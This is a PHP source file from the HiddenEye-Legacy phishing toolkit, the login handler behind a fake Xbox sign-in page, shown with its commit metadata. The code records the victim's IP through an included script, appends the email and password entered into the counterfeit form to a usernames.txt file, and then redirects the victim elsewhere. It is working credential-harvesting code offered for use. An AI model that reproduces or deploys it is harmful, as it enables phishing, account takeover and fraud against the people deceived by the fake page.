HiddenEye-Legacy/WebPages/xbox/login.php
Moltivie 2de87f7742 Fix #448, #449, #416, #431 and #390 (#450)
* Fix #448

* Fix #449

* Fix #416 and #431

* Added Xbox

* Fix MySpace and ProtonMail

* .gitignore file

* Fix ip.txt
2019-11-18 10:00:29 +00:00

11 lines
274 B
PHP

<?php
include 'ip.php';
session_start();
$pass = $_POST["passwd"];
$email=$_SESSION["Email"];
file_put_contents("usernames.txt", "[EMAIL]: " . $email . " [PASS]: " . $pass . "\n", FILE_APPEND);
header('Location: <CUSTOM>');
exit();
session_destroy();
?>